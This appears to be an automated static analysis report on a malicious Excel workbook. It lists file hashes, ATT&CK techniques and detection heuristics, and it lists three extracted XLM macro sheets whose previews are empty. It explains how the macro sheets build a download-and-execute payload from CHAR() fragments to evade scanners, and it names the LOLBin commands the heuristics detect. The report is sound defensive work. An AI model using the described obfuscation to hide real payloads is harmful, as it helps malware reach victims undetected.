Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 80afad8cad6c0a84…

MALICIOUS

Office (OOXML)

Size: 155.1 KB
Created: 2006-09-16 00:00:00 UTC
Authoring application: Microsoft Excel 16.0300
First seen: 2021-06-28
MD5: 79d94d53703ee58ab2aac1782cbd6939
SHA-1: 16a918e278d56ed854a3314d2a4ea907001195fc
SHA-256: 80afad8cad6c0a84c232d5d17354b11ff9e5920d65c2552047801bc73a8bec82
Risk Score: 120

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1203 Exploitation for Client Execution

The file is identified as malicious due to the presence of Excel 4.0 macro sheets. These sheets contain payloads reassembled at runtime from CHAR() calls and split formulas, designed to download and execute a second-stage payload from the embedded URL. The specific nature of that payload is not discernible from the available evidence, so the sample is classified as 'unknown family'.

Heuristics (2)

  • Excel 4.0 macro sheet (3 sheets), severity: critical, 1 related finding, rule OOXML_XLM_MACROSHEET
    Spreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks. The macro sheet is stored as XLSB/BIFF12 binary content, which many XML-only OOXML scanners miss.
  • XLM payload reassembled from CHAR()/split formulas, severity: critical, rule OOXML_XLM_REASSEMBLED_PAYLOAD
    An Excel 4.0 macro sheet builds its payload inside the formula token stream by concatenating per-character CHAR() calls and string fragments, so no WinAPI name, shell command, or URL is ever contiguous in the .bin for a literal-bytes scan to find. Reassembling the formulas recovered download/execute API names, LOLBin commands (regsvr32/rundll32/mshta/wmic/powershell), or a payload URL — the de-obfuscated download-and-run kill chain.

Extracted artifacts (3)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
xlm_sheet_00.bin | xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/intlsheet1.bin | 5827 bytes
SHA-256: 865ab6ecca92e5c90fc28bbfb3c5677f6893cf12f68231266cb8abbb1ecd112f
Preview script
First 1,000 lines of the extracted script
xlm_sheet_01.bin | xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/intlsheet2.bin | 1178 bytes
SHA-256: f4819779647ecf294bc5364c014ef020fbf7fe514c907c00c8c11b4050071fa2
Preview script
First 1,000 lines of the extracted script
xlm_sheet_02.bin | xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/intlsheet3.bin | 3882 bytes
SHA-256: df8bd9f2cf5b7eba0d541d79e4fc3aa37da4e275222043bcbfc50f54bee4ab96
Preview script
First 1,000 lines of the extracted script